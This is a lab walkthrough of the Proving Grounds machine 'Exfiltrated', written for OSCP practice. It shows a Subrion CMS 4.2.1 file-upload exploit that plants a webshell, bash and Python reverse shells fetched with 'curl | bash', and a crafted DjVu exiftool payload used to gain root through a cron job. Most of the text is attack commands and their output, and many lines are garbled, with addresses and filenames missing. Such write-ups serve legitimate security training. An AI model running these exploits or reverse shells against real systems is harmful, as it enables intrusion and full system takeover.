Proving grounds:Exfiltrated

Today we will take a look at Proving grounds: Exfiltrated. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Subrion CMS — Open Source Content Management System
| http-robots.txt: 7 disallowed entries
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
|_http-title: Home :: Powered by Subrion 4.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add to the hosts file.

└─# cat /etc/hosts localhost kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters exfiltrated.offsec


Check default credential


Look for an exploit according to the version of the CMS

└─# searchsploit Subrion CMS 4.2.1Subrion CMS 4.2.1 — Arbitrary File Upload | php/webapps/└─# searchsploit -m php/webapps/└─# python -u http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: Y1pnLHaAFll0W1VUW6I7bD0XPpc0iJJ719ZVspL5
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: kobwkomavbmiyio
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/kobwkomavbmiyio.phar
$ whoami

I get reverse again to upgrade shell

└─# cat 
bash -i >& /dev/tcp/ 0>&1└─# python3 -m http.server 80$ curl | bash└─# nc -nvlp 4242
listening on [any] 4242 ...
connect to [] from (UNKNOWN) [] 51084
bash: cannot set terminal process group (897): Inappropriate ioctl for device
bash: no job control in this shell
python3 -c ‘import pty;pty.spawn(“/bin/bash”);’export TERM=xtermCtrl + zstty raw -echo ; fgreset
www-data@exfiltrated:/var/www/html/subrion/uploads$ cat /etc/crontab* * * * root bash /opt/image-exif.shwww-data@exfiltrated:/var/www/html/subrion/uploads$ cat /opt/ 
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata
echo -ne “\\n metadata directory cleaned! \\n\\n”IMAGES=’/var/www/html/subrion/uploads’META=’/opt/metadata’
FILE=`openssl rand -hex 5`
echo -ne “\\n Processing EXIF metadata now… \\n\\n”
ls $IMAGES | grep “jpg” | while read filename;
exiftool “$IMAGES/$filename” >> $LOGFILE
echo -ne “\\n\\n Processing is finished! \\n\\n\\n”

Look at the version of Exiftool

www-data@exfiltrated:/var/www/html/subrion/uploads$ exiftool -ver

└─# sudo apt-get update && sudo apt-get install -y djvulibre-bin
└─# cat
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);
└─# cat exploit
(metadata "\c${system ('curl | bash')};")
└─# djvumake exploit.djvu INFO=0,0 BGjp=/dev/null ANTa=exploit└─# mv exploit.djvu exploit.jpg└─# nc -nvlp 4444

On the target machine

www-data@exfiltrated:/var/www/html/subrion/uploads$ wget

After a few minutes

└─# nc -nvlp 4444
listening on [any] 4444 …
connect to [] from (UNKNOWN) [] 48712
/bin/sh: 0: can’t access tty; job control turned off
# whoami
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux exfiltrated 5.4.0–74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”



Al1z4deh:~# echo "eJPT, CEH, OSCP"

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store